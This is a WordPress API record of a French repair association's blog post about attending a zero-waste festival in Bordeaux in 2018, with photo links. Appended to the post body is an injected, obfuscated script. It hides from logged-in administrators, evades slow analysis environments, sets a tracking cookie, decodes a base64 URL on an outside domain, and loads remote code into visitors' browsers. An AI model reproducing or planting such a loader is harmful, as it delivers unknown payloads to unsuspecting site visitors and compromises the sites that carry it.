{"id":285,"date":"2018-11-26T19:31:53","date_gmt":"2018-11-26T17:31:53","guid":{"rendered":"http:\/\/reparenjalles.saintmedardasso.fr\/?p=285"},"modified":"2026-02-17T15:55:57","modified_gmt":"2026-02-17T14:55:57","slug":"reparen-jalles-au-festival-zz","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=285","title":{"rendered":"R\u00e9par&rsquo;en Jalles au Festival ZZ"},"content":{"rendered":"<p>R\u00e9par&rsquo;en Jalles \u00e9tait pr\u00e9sent au Festival ZZ (Z\u00e9ro D\u00e9chet, Z\u00e9ro Gaspillage) qui a eu lieu vendredi 23 et samedi 24 novembre 2018 \u00e0 Bordeaux.<\/p>\n<p>Nous avons, entre autres activit\u00e9s, accueilli des groupes scolaires (\u00e9cole primaire et coll\u00e8ge) pour les sensibiliser \u00e0 la r\u00e9paration et \u00e0 la diminution des d\u00e9chets.<\/p>\n<p><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-286\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-3-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-3-300x225.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-3-768x576.jpg 768w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-3-1024x768.jpg 1024w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-3.jpg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-287\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-2-300x225.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-2-768x576.jpg 768w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-2-1024x768.jpg 1024w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/FESTIV-ZZ-2.jpg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181123_150700.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-300\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181123_150700-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181123_150700-300x169.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181123_150700-768x432.jpg 768w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181123_150700.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181124_124049.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-301\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181124_124049-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181124_124049-300x169.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181124_124049-768x432.jpg 768w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/11\/20181124_124049.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>R\u00e9par&rsquo;en Jalles \u00e9tait pr\u00e9sent au Festival ZZ (Z\u00e9ro D\u00e9chet, Z\u00e9ro Gaspillage) qui a eu lieu vendredi 23 et samedi 24 novembre 2018 \u00e0 Bordeaux. Nous avons, entre autres activit\u00e9s, accueilli des groupes scolaires (\u00e9cole primaire et coll\u00e8ge) pour les sensibiliser \u00e0 la r\u00e9paration et \u00e0 la diminution des d\u00e9chets. &nbsp;<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-285","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/285","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=285"}],"version-history":[{"count":1,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/285\/revisions"}],"predecessor-version":[{"id":2067,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/285\/revisions\/2067"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=285"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}